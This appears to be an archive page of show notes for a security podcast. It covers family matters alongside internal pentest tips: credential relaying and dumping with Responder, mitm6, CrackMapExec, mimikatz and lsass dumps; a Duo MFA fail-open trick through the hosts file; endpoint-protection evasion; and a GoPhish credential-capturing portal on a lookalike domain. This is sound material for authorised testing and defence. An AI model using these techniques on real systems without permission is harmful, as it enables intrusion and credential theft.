- Do you know someone who would enjoy a live 3-song acoustic concert? Check out my family's new ministry, Q.U.A.C.K. - Quarantined Unplugged Acoustic Concerts of Kindness.
- A Webinar on creating kick-butt cred-capturing phishing portals is happening on Tuesday, April 14! Register here !
View this episode's show notes for more information
Published: Friday, April 03, 2020
This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to...
- How the cell phone contract I put together for my tweenager kind of blew up in my face
- I'm the worst dad in the world because my wife and I enforced a "no screens" policy for a few weeks. We lived. Barely.
- Apple Screen Time is your friend, and helps put some limits on iDevice use
- The Dream Machine makes it easy to setup a segmented wireless network just for your kids. You can also "time box" their individual network to only broadcast at certain hours of the day
- You can then apply OpenDNS to filter bad sites on just the kiddo network or ALL your networks
- If you make a home backup/DR plan make sure it includes important stuff like: passwords to important things, as well as critical contacts like your tax prep person, financial advisor and subcontractors.
- When doing school-from-home when one kid isn't in the house, we've found it helpful to setup a shared Google doc that contains high priority projects and a calendar with expectations for the week. We will also be doing a daily FaceTime check-in to make sure everything is going well.
- This virus is a "big fat buttweek" - according to my 9-year-old
View this episode's show notes for more information
Published: Thursday, March 26, 2020
In today's episode I share four fun stay-at-home security projects - three with a security focus and one centered around music. Let's gooooooooo!FoldingAtHomeThe Folding At Home project helps use...
- Edit > EOL Conversion > Unix (LF)
View this episode's show notes for more information
Published: Saturday, March 21, 2020
This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to...
- Priced at ~$500
- One on-prem array
- Encrypted at rest
- Backs up to cloud with encryption key I control
- Unlimited scalable storage
- Synology DS218+
- 2 Seagate Ironwolf 4TB drives
- 4GB of RAM for the NAS
- CrashPlan subscription
- CrashPlan docker container
View this episode's show notes for more information
Published: Friday, March 13, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode of...
- MFA on internal servers (which we bypassed )
- Strong passwords
- Limited vulnerable protocols (LLMNR/Netbios/etc) available to abuse for cred-capturing
- Servers that were heavily firewalled off from talking SMB to just any ol' subnet nor the Interwebs (here's a great video on how to fine-tune your software firewall chops)
- How maybe it's not a good idea to make computer go completely "shields down" during pentests
- Being careful not to fat-finger anything when you spawn cmd.exe with creds, like
- Being careful not to fat-finger anything when using CrackMapExec
- How fundamental and really effective blue team controls (such as the ones mentioned above) can really make pentesting a headache!
- How you should be careful when spawning shells with MultiRelay (part of Responder is it creates new services on your victim machine
View this episode's show notes for more information
Published: Monday, March 09, 2020
Today's slightly off-topic episode kicks off a new tag called 7MOOMAMA. That stands for 7 Minutes of Only Music and Miscellaneous Awesomeness.To kick things off, I'm super excited to share with you two new security-themed songs for some of my favorite security things! They are:Enjoy!Backdoors and...
- Backdoors and Breaches - my favorite incident response card game!
- OWASP Juice Shop - my favorite vulnerable Web application!
View this episode's show notes for more information
Published: Wednesday, February 26, 2020
Today I'm joined by Matt Duench ( LinkedIn / Twitter ), who has a broad background in technology and security - from traveling to over 40 countries around the world working with telecom services, to his current role...
- Corporate conversations around security have changed drastically in such a short time - specifically, security is generally no longer perceived as a cost center. So why are so many organizations basically still in security diapers as far as their maturity?
- Why is it still so hard to find “bad stuff” on the network?
- What are some common security mistakes you wish you could wave a magic wand and fix for all companies?
- The beauty of the CIS Top 20 and how following even the top 5 controls can stop 85% of attacks.
- Low-hanging hacker fruit that all organizations should consider addressing, such as:Disabling IPv6Using a password managerTurning on multi-factor authenticationDon’t write down your passwords!Have a mail transport rule that marks external mail as “EXTERNAL” so it jumps out to peopleConsider an additional rule to stop display name spoofing (h/t to Rob on Slack !)
- Disabling IPv6
- Using a password manager
- Turning on multi-factor authentication
- Don’t write down your passwords!
- Have a mail transport rule that marks external mail as “EXTERNAL” so it jumps out to people
- Consider an additional rule to stop display name spoofing (h/t to Rob on Slack !)
- Why you should be concerned about corporate account takeover, and how to better protect yourself and your company against this attack vector
- Do you (Arctic Wolf) have an option to integrate with various firewall/IPS vendors to automatically block confirmed attacks?
- Can you detect IT-only or also OT/ICS attacks?
- How quickly can you detect newly released vulnerabilities in IT systems?
- Can you detect if someone has breached a particular website/service?
- Can you detect if a user opened a phishing mail?
- Is the Arctic Wolf manned 24/7/365?
- How is the set up done for Arctic Wolf? Do you have a machine in the client’s network, and those machines send data to a central location?
- Does Arctic Wolf use endpoint detection or do they have network devices deployed as well (perhaps to pick things up on devices that can't run their agent)?
View this episode's show notes for more information
Published: Friday, February 21, 2020
It’s episode 401 and we’re having fun, right? Some things we cover today:Besides that, I’ve got a wonderful tale of pentest pwnage for you. Warning: this is a TBC (to be continued) episode in that I don’t even know how it will shake out. I’m honestly not sure if we’ll get DA! Here are the...
- The Webinar version of the DIY Pwnagotchi evening will be offered in Webinar format on Tuesday, March 10 at 10 a.m.
- A quick house fire update - we’re closer to demolition now!
- I finally got a new guitar !
- I think in the past I might've said unauthenticated Nessus scans weren't worth much, but this test changed my mind.
- If you can't dump local hashes with CrackMapExec, try SecretsDump!
- If you're relaying net user commands (or just typing them from a relayed shell), this one-liner is a good way to quickly add your user to local admins and the Remote Desktop Users group:
- Trying to RDP into a box protected with Duo MFA? If you can edit the c:\windows\system32\drivers\etc\hosts file, you might be able change the Duo authentication server from api-xxxxxxx.duosecurity.com to 127.0.0.1 and force authenetication to fail open! Source: Pentest Partners
- In general, keep an eye on CrackMapExec's output whenever you use the '-x' flag to run commands. If the system is "hanging" on a command for a while and then gives you NO output and just drops you back at your Kali prompt, the command might not be running at all due to something else on the system blocking your efforts.
- To check if the wdigest flag is properly set on a machine, run:
View this episode's show notes for more information
Published: Friday, February 14, 2020
Wow, happy 400th episode everybody! Also, happy SIXTH birthday to the 7MS podcast!Today I've got a really fun tale of internal network pentest pwnage to share with you, as well as a story about a "poop-petrator." Key moments and takeaways include:Has 7MS helped you in your IT and security career?...
- Your target network might have heavy egress filtering in place. I recommend doing full apt-get update and apt-get upgrade and grabbing all the tools you need (may I suggest my script for this?).
- If the CrackMapExec --sam flag doesn't work for you, give secretsdump a try, as I ran it on an individual Win workstation and it worked like a champ!
- If the latest mimikatz release doesn't rip out passwords for you, try the release from last August. For whatever reason (thanks 0xdf ) for the tip!
- If your procdumps of lsass appear to be small, endpoint protection might be getting in the way! You might be able to figure out what's running - and stop the service(s) - with CrackMapExec and the -x 'tasklist /v' flag.
- If you need to bypass endpoint protection, don't be afraid to go deep into the Google search results. Unfortunately, I think that's all I can say about that, as vendors seem to get snippy about talking about bypasses publicly.
View this episode's show notes for more information
Published: Friday, February 07, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Believe it or not...
- Inland Premium 512GB SSD 3D NAND M.2 2280 PCIe NVMe 3.0 x4 Internal Solid State Drive
- Intel Core i5-9400F Desktop Processor 6 Core up to 4.1GHz Without Processor Graphics LGA1151 - Intel 300 Series chipset
- ASUS ROG Strix Z390-H Gaming LGA 1151 ATX Intel Motherboard
- EVGA SuperNOVA 1200P2 1200 Watt 80 Plus Platinum Modular Power Supply
- Corsair Graphite 760T ATX Full-Tower Computer Case
- G.Skill Ripjaws V 16GB 2 x 8GB DDR4-3200 PC4-25600 CL16 Dual Channel Desktop Memory Kit F4-3200C16D-16GVKB
- EVGA GeForce RTX NVLINK SLI Bridge - 4 Slot Spacing
- Cooler Master Hyper 212 Black Universal CPU Cooler
- 2x - EVGA GeForce RTX 2080 Ti FTW3 Ultra Gaming Triple-Fan 11GB GDDR6 PCIe 3.0 Video Card
- Download the Ubuntu mini.iso
View this episode's show notes for more information
Published: Thursday, January 30, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.I'll be your...
View this episode's show notes for more information
Published: Thursday, January 23, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.I'm working on a new...
View this episode's show notes for more information
Published: Wednesday, January 15, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.In [last week's...
- How I don't remember lyrics or titles to songs - even the ones I love - such as My Prerogative . That's why Jack Black is my spirit animal, and he's awesome for singing Elton John songs right to Elton John
- If you get DA (relatively) quickly, consider pivoting to a network assessment and crack hashes with secretsdump , test egress filtering , run Network Detective and more
- Once you've cracked all the hashes you can, run it through hashcombiner and Pipal like this:
- The procdump + lsass trick is still really effective (though sometimes AV gobbles it)
- Wanna see if a user has a specific Chrome extension installed? Check this article and then use CrackMapExec with -x dir c:\x\y\z to verify its existence!
- I jacked up my ankle and suffered an avulsion fracture . It's good times.
- Cyber Mentor
- hausec
- Josh T
- Dirk-jan Mollema
- Cyberfreaq who helped me resolve a key issue with mitm6
- Dominic from Slack
- Gh0sthax from Slack
- Nate from Slack
View this episode's show notes for more information
Published: Thursday, January 09, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.In today's tale of...
- It's great to have additional goals to achieve in a network pentest outside of just "get DA"
- PayloadsAllTheThings has a great section on Active Directory attacks
- Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack!
- If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like:
- When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields!
- Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good!
- Cyber Mentor
- hausec
- Josh T
- Dirk-jan Mollema
- Cyberfreaq who helped me resolve a key issue with mitm6
- Dominic from Slack
- Gh0sthax from Slack
- Nate from Slack
View this episode's show notes for more information
Published: Friday, January 03, 2020
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Sung to the tune of...
View this episode's show notes for more information
Published: Thursday, December 26, 2019
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Peter Kim of [The Hacker...
- The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-)
- How do you balance work and family life when trying to pwn all the things and have a personal life and significant other?
- How do you break into security when your background is in something totally different, like a mechanic, artist or musician?
- What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both?
- What are some other low-hanging fruit organizations can use to better defend their networks?
- Do you run across some of these good defenses - like honeypots - in your engagements?
- If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be?
- Stuck on a pentest? Try explaining the situation to a non-technical person!
- What irks you during a pentest?
- Have you run into any cyber deception on a pentest, or other things that make you go "Curse you blue team!!!"?
- Have you ever stumbled upon a legitimate compromise or breach during testing?
- Do you do your own "house clean up" when done with an engagement (killing shells, removing .scf files, payloads, artifacts, etc.) or do you leave that responsibility up to the client?
- What would you do if you weren't doing security?
- What movie or movie character resembles your life?
- If you had to wear one shirt for the rest of your life, what would it be/say and why?
- Would you rather have a belly button that could dispense ketchup, or fingers that could dispense hot dogs?
- You've got Bruce Willis, Mike Pence and Pink in a room. You need to hug one, do a 17-hour non-stop road trip with one, and be a year-long security consultant to the third. Who do you pick, and why?
- Secure Planet training
- The Hacker Playbook series
View this episode's show notes for more information
Published: Friday, December 20, 2019
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...
- It's awesome
- It's free
- People still haven't heard of it when I share info about it during conference talks!
- I've got a full write-up of how to install LAPS here
- At a recent conference people asked me two awesome edge case questions:
- What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it?
- What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?
View this episode's show notes for more information
Published: Thursday, December 12, 2019
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...
- Have you hit rock bottom yet? (Spolier alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain)
- How long to you get to keep rental cars before you have to replace your permanent vehicles?
- Do you have to stay in a hotel the whole time your house is rebuilt?
- What about when you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt?
- What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?
View this episode's show notes for more information
Published: Friday, December 06, 2019
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...
- What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)
- A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX
- This handy script runs nmap against subnets, then Eyewitness , then emails the results to you
- Early in the engagement I'd highly recommend checking for Kerberoastable accounts
- I really like Multirelay to help me pass hashes, like:
- Once you get a shell, run dump to dump hashes!
- Then, use CME to pass that hash around the network!
- Then, check out this article to use NPS and get a full-featured shell on your targets
View this episode's show notes for more information
Published: Thursday, November 21, 2019
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In [part...
- How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes:
- New licenses
- New ATM/credit cards
- Rental vehicles
- Temporary housing
- How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not the people you expect
- What's it like working with the insurance machine? What do they help with and not help with?
- How much does it suck to lose all your stuff? (Spoiler alert: a lot)
- The relief (as weird as that sounds) that comes with losing all your material things
View this episode's show notes for more information
Published: Friday, November 15, 2019
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...
- Today: Talk about "day zero" - everything that happened on the day of the fire
- Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards
- Part 3: talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith?
View this episode's show notes for more information
Published: Monday, November 11, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- Docusign is out and (sort of) replaced with Proposify
- Voltage SecureMail is out and replaced by ShareFile
- Ninite is rad for keeping mobile pentest dropboxes automatically updated!
- Nessys_SortyMcSortleton has been updated to...you know...work
- How do you (comfortably) talk about money with a client before the SOW hits their inbox?
- If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?
View this episode's show notes for more information
Published: Friday, November 01, 2019
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!I'm sorry it took me forever and a day...
- Running into angry system admins (that are either too fired up or not fired up enough)
- Being wrong without being ashamed
- When is it necessary to make too much noice to get caught during an engagement?
- What are the top 5 tools you run on every engagement?
- How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
- How do you deal with clients who scope things in such as way that the test is almost impossible to conduct?
- How do you deal with colleagues who take findings as their own when they talk with management?
- How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark?
- What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
- How could a fresh grad get into a red team job?
- What do recruiters look for candidates seeking red team positions?
- If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them?
- What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one?
- What's your favorite red team horror story?
View this episode's show notes for more information
Published: Friday, November 01, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks)
- Offensive Security Wireless Professional
- Pentester Academy
- VulnHub
- Rastalabs
- The Cyber Mentor
- WEFFLES
- Logging Made Easy
- HELK
- Wazuh
View this episode's show notes for more information
Published: Saturday, October 12, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- Consider this list of top 9 phishing simulators.
- Check out GoPhish !
- Then spin up a free tier Kali AWS box
- Follow the instructions to install GoPhish and get it running on your AWS box
- Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation
- Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain
- Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this:
- Use this awesome article to secure your fancy landing page with a LetsEncrypt cert!
- Have fun!!!
View this episode's show notes for more information
Published: Tuesday, October 01, 2019
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!This episode is a "sequel" of sorts to...
- Relayed one high-priv cred from one box to another
- Dumped and cracked a local machine's hash
- Passed that hash around the network
- Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
- Set the wdigest flag via CrackMapExec
View this episode's show notes for more information
Published: Tuesday, September 24, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- Strong user passwords
- A SIEM solution that appeared to be doing a great job
- Systems missing EternalBlue patch
- Systems missing BlueKeep patch
View this episode's show notes for more information
Published: Wednesday, September 18, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot.
- Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source ):
- To turn on remote desktop:
- To set the firewall to allow RDP:
- To stop the freakin' Windows hosts from going to sleep:
- To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then:
- To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time"
- Get SSH keys regenerated and install/run openssh server:
- Then grab some essential pentesting tools using Kali essentials , and keep them updated with git update
View this episode's show notes for more information
Published: Thursday, September 05, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- Conducted general nmap scans (and additional scans specifically looking for Eternal Blue)
- Sucked our nmap scans into Eyewitness
- Captured and cracked some creds with Paperspace
- Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)
- Checking the environment for CVE-2019-1040
- Picking apart the privileges on my "pseudo domain admin" account
- Making a startling discovery about how almost all corp passwords were stored
View this episode's show notes for more information
Published: Friday, August 30, 2019
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!This episode, besides talking about a...
- Review of setting up your DIY pentest dropbox
- Choosing the right hardware (I'm partial to this NUC )
- Running Responder to catch creds
- Using Eyewitness to snag screenshots of stuff discovered with nmap scanning
- Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
- Running Sharphound to get a map of the AD environment
- Cracking creds with Paperspace
- When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!
View this episode's show notes for more information
Published: Thursday, August 22, 2019
In today's episode, I sit down with Zane West of Proficio . Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moved up into global infrastructure architect...
- How important is it to have an IT background before you jump into security?
- How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!"
- Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks?
- Why in the world does it take twenty seven people to run a SOC?!
- When should an organization consider engaging an MSSP to help them with their security needs?
- What if your MSP also provides MSSP services? Is that a good or bad thing?
- What are some tips for successfully deploying a SIEM?
- What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs tip their toe in it as well? (Here's a nice graph to help you understand it)
View this episode's show notes for more information
Published: Friday, August 16, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- Turn the firewall offSet Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled.
- Disable Windows DefenderNavigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender.
- Disable power sleep settingsTo stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled
- Create a second disk on the Windows management VM and install BitLocker to Go
- Snooze windows updates (for a reasonable amount of time) during a pentest so the box doesn't auto-reboot
- Set a static DNS entry of something popular/public like 1.1.1.1 or 4.2.2.2 or 8.8.8.8 to ensure your dropbox can reach the Internet once connected.
View this episode's show notes for more information
Published: Monday, August 12, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...
- I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together.
- I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers .
- I had a really fun pentest recently where I found some good old school SQL injection . I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability. Here are some steps/tips I talk about on today's episode that will help:Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilitiesInstall CO2 from the BApp storeWhen doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings Grab a copy of sqlmap Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this:
- Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities
- Install CO2 from the BApp store
- When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings
- Grab a copy of sqlmap
- Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this:
- Also, practice your SQL injection (and other skills) on the OWASP Juice Shop !
View this episode's show notes for more information
Published: Saturday, August 03, 2019
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!I swear this program isn't turning into the Dr....
- Doing a 8-10 hour internal pentest is probably overly ambitious. Seriously, it's really NOT a lot of time.
- If a client uses a logging/alerting system, vulnerability scanning is very loud to their digital ears
- Checking for DNS zone transfers is a good idea!
View this episode's show notes for more information
Published: Wednesday, July 24, 2019
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Ok, I lied a few episodes ago, and I'm sorry! I...
View this episode's show notes for more information
Published: Friday, July 19, 2019
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today's episode is a two-tale story of me...
View this episode's show notes for more information
Published: Monday, July 15, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...
- Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
- Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
- Want to be more sniper-focused in your hash-passing? Try the MultiRelay tool as part of the Responder kit. You can choose just a target IP and just specific usernames in hashes to pass. This site has some great examples, but here's an example with one target IP and just the domain administrator accounts from AD:
- Ryan Haus for his awesome series on penetration testing Active Directory as well as...
- Vincent Yiu for pointing me to this article which gave me the path to domain admin. I'll let you soak in that article as there's a lot of meat in it, but here's the attack path I followed:
View this episode's show notes for more information
Published: Friday, July 12, 2019
Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...
- Having separate accounts for day-to-day operations and administrative/privileged tasks
- Local Administrator account largely disabled across the enterprise
- Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.)
- Hard-to-crack passwords!
View this episode's show notes for more information
Published: Wednesday, July 03, 2019
Hey folks, happy secure 4th o' July!In today's seven minute episode (Wha? Gasp! Yep...it's seven minutes!) I kick back a bit, give you some updates and tease/prepare you for some cool full episodes to come in the near future. Topics covered include:.
- NPK , which I talked about last week is super awesome but I'm having issues getting my jobs to run clean. Will keep you posted on progress!
- Tales of internal pentest pwnage - wow, folks have been sending me feedback that they really like this series. I've got a good episode coming up for you on that front, just can't share right now as the project is just wrapping up.
- Songwriting - I enjoy writing songs about people to the tune of the old Spiderman theme song . If they ever do a show like The Voice but they're looking for people to write songs about other people based on the Spiderman theme song, I think I've got a shot.
View this episode's show notes for more information
Published: Friday, June 28, 2019
Today's episode is brought to you by my friends at safepass.me . Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is...
- People are telling me they're having problems installing the drivers
- My methodology for building wordlists with HateCrack doesn't seem to work anymore
- I often pay a lot of $ for idle time since you pay ~$5/month just for the VM itself, and then a buck and change per hour the box is running - even when it's not cracking anything.
View this episode's show notes for more information
Published: Monday, June 24, 2019
This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8 .In today's...
- Scope projects well - I've been part of many over- and under-scoped projects due to PMs and/or sales folks doing an oversimplified calculations, like "URLs times X amount of dollars equals the SOW price." I recommend sending clients a more in-depth questionnaire and even jump on a Web meeting to get a nickel tour of their apps before sending a quote.
- Train your juniors - IMHO, they should shoulder-surf with more senior engineers a few times and not do much hands-to-keyboard work at first (except maybe helping write the report) until they demonstrate proficiency.
- Use automated pentest tools with caution - they need proper tuning/care/feeding or they can bring down Web sites and "over test" parameters.
View this episode's show notes for more information
Published: Monday, June 17, 2019
This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Hey! I'm on the road again - this time with a tale encompassing:How to conduct a mini risk assessment in just two hours. Some ways to consider...
- A discussion of administrative and physical controls
- Create a network inventory using nmap and Eyewitness
- Conduct an external vulnerability scan with Nessus or OpenVAS
View this episode's show notes for more information
Published: Monday, June 17, 2019
This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Today's episode was recorded on the way to a new assessment, and since I had nothing but miles and time in front of me, I covered two major...
View this episode's show notes for more information
Published: Thursday, May 30, 2019
This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8 .First, a bit...
- If you replace "red rain" with "red team" in this song , we might just have a red team anthem on our hands!
- If you're in the Twin Cities area and looking for an infosec analyst job, check out this posting with UBB . If interested, I can help make an electronic introduction - and/or let 'em know 7 Minute Security sent ya!
- Recon - it's super important! It's like putting together puzzle pieces...and the more of that puzzle you can figure out, less likely you'll be surprised and the more likely you'll succeed at your objective! Try and figure out:
- Who are the important people and what do they do?
- What does the company's Internet footprint look like?
- What's the internal network look like - any idea of the browsers in play (think malware!)?
- Reporting - how do you deliver reports in a way that blue team doesn't feel picked on, management understands the risk, and ultimately everybody leaves feeling charged to secure all the things?
- Any tips for the most dreaded part of an assessment (reports)?
- How do you get around PowerShell v5 with restrict language mode without having the ability to downgrade to v2?
